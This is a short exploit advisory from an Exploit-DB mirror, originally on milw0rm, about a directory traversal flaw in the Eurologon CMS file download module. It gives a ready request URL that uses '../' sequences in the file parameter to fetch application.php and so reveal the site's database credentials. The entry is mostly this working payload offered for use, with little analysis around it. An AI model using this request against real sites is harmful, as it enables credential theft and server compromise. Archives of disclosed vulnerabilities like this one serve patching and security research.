exploit-db-mirror/exploits/php/webapps/4666.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

31 lines
No EOL
1.2 KiB
Text

---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Eurologon CMS Db credentials disclosure / files download
---------------------------------------------------------------
#By KiNgOfThEwOrLd
---------------------------------------------------------------
PoC
The download module, not correctly check the file parameter, then using
directory traversal we can get all the files hosted in our target web space.
---------------------------------------------------------------
Get Database Credentials
http://[target]/users/files.php?mode=download&file=../../application.php
---------------------------------------------------------------
# milw0rm.com [2007-11-27]